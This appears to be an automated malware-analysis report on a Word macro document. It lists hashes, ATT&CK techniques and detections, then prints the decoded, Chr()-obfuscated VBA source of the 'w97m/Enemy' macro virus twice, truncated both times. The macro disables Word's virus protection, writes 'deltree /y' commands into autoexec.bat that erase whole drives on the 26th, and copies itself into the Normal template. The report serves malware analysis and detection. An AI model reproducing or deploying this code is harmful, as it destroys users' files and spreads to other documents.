Office (OLE) malware analysis — malicious · afc3b48d4004bff9

MALICIOUS

Office (OLE)

37.5 KB Created: 2001-02-22 08:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 37857410d4b274afbfc1069ca9df6f54 SHA-1: f6e8fbeb9a414341753333edc6349145b11fa0a3 SHA-256: afc3b48d4004bff982f74f0cb62cfa343967b865c98bceed19a5fe0da9ac4a64

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1027 Obfuscated Files or Information

The sample contains VBA macros that attempt to disable virus protection and execute a batch file. The macro code is obfuscated, but it appears to be constructing paths to 'C:\windows\system\brsec32.dll' and 'C:\autoexec.bat'. The Document_Open macro is designed to run automatically when the document is opened, indicating a malicious intent to compromise the system.

Heuristics 3

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39506 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	39506 bytes
SHA-256: `c8df07b6390359e9530c7849258dcaae5f22f778876a9e78d7012c591259e384`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Enemy Private Sub Document_Open() 'w97m/Enemy On Error Resume Next Options.VirusProtection = 0 Options.ConfirmConversions = 0 Options.SaveNormalPrompt = 0 Dim Flag As Boolean Dim hFile As Long With Application .EnableCancelKey = False .ScreenUpdating = False .DisplayAlerts = wdAlertsNone .ShowVisualBasicEditor = False End With If Day(Now()) = 26 Then If UCase(Dir(Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(92) + Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108))) <> UCase(Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108)) Then If UCase(Left$(Application.UserName, 1)) = "R" Then Flag = 1 BatMod = GetAttr(Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116)) SetAttr strFile, vbNormal Deltree$ = Chr(100) + Chr(101) + Chr(108) + Chr(116) + Chr(114) + Chr(101) + Chr(101) + Chr(32) + Chr(47) + Chr(121) + Chr(32) Nul$ = Chr(32) + Chr(62) + Chr(32) + Chr(110) + Chr(117) + Chr(108) hFile = FreeFile Open Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116) For Append Access Write As hFile Print #hFile, vbCr + vbLf + Chr(64) + Chr(101) + Chr(99) + Chr(104) + Chr(111) + Chr(32) + Chr(111) + Chr(102) + Chr(102) Print #hFile, Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(32) + Chr(111) + Chr(102) + Chr(102) If Flag = 1 Then Print #hFile, Deltree$ + Chr(102) + Chr(58) + Chr(92) + Nul$ Print #hFile, Deltree$ + Chr(101) + Chr(58) + Chr(92) + Nul$ Print #hFile, Deltree$ + Chr(100) + Chr(58) + Chr(92) + Nul$ End If Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(109) + Chr(121) + Chr(100) + Chr(111) + Chr(99) + Chr(117) + Chr(126) + Chr(49) + Nul$ Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(112) + Chr(114) + Chr(111) + Chr(103) + Chr(114) + Chr(97) + Chr(126) + Chr(49) + Nul$ Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Nul$ Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Nul$ Close hFile SetAttr strFile, BatMod End If End If With Dialogs(wdDialogFileSummaryInfo) .Author = "" .Title = "" .Subject = "" .Comments = "" .Keywords = "" .Execute End With NormalAttrib = GetAttr(NormalTemplate.FullName) If NormalAttrib = vbReadOnly Then GoTo Fuck If NormalAttrib = vbReadOnly + vbArchive Then GoTo Fuck Set ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule If ad.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then If ad.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines ad.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41) & vbCr & nt.Lines(3, nt.CountOfLines - 10)) End If If nt.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then If nt.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines nt.DeleteLines 1, nt.CountOfLines nt.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114 ... (truncated)

SHA-256: c8df07b6390359e9530c7849258dcaae5f22f778876a9e78d7012c591259e384

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Enemy
Private Sub Document_Open()
'w97m/Enemy
On Error Resume Next
Options.VirusProtection = 0
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Dim Flag As Boolean
Dim hFile As Long
With Application
.EnableCancelKey = False
.ScreenUpdating = False
.DisplayAlerts = wdAlertsNone
.ShowVisualBasicEditor = False
End With
If Day(Now()) = 26 Then
If UCase(Dir(Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(92) + Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108))) <> UCase(Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108)) Then
If UCase(Left$(Application.UserName, 1)) = "R" Then Flag = 1
BatMod = GetAttr(Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116))
SetAttr strFile, vbNormal
Deltree$ = Chr(100) + Chr(101) + Chr(108) + Chr(116) + Chr(114) + Chr(101) + Chr(101) + Chr(32) + Chr(47) + Chr(121) + Chr(32)
Nul$ = Chr(32) + Chr(62) + Chr(32) + Chr(110) + Chr(117) + Chr(108)
hFile = FreeFile
Open Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116) For Append Access Write As hFile
Print #hFile, vbCr + vbLf + Chr(64) + Chr(101) + Chr(99) + Chr(104) + Chr(111) + Chr(32) + Chr(111) + Chr(102) + Chr(102)
Print #hFile, Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(32) + Chr(111) + Chr(102) + Chr(102)
If Flag = 1 Then
Print #hFile, Deltree$ + Chr(102) + Chr(58) + Chr(92) + Nul$
Print #hFile, Deltree$ + Chr(101) + Chr(58) + Chr(92) + Nul$
Print #hFile, Deltree$ + Chr(100) + Chr(58) + Chr(92) + Nul$
End If
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(109) + Chr(121) + Chr(100) + Chr(111) + Chr(99) + Chr(117) + Chr(126) + Chr(49) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(112) + Chr(114) + Chr(111) + Chr(103) + Chr(114) + Chr(97) + Chr(126) + Chr(49) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Nul$
Close hFile
SetAttr strFile, BatMod
End If
End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = ""
.Title = ""
.Subject = ""
.Comments = ""
.Keywords = ""
.Execute
End With
NormalAttrib = GetAttr(NormalTemplate.FullName)
If NormalAttrib = vbReadOnly Then GoTo Fuck
If NormalAttrib = vbReadOnly + vbArchive Then GoTo Fuck
Set ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If ad.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then
If ad.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines
ad.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41) & vbCr & nt.Lines(3, nt.CountOfLines - 10))
End If
If nt.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then
If nt.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines
nt.DeleteLines 1, nt.CountOfLines
nt.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.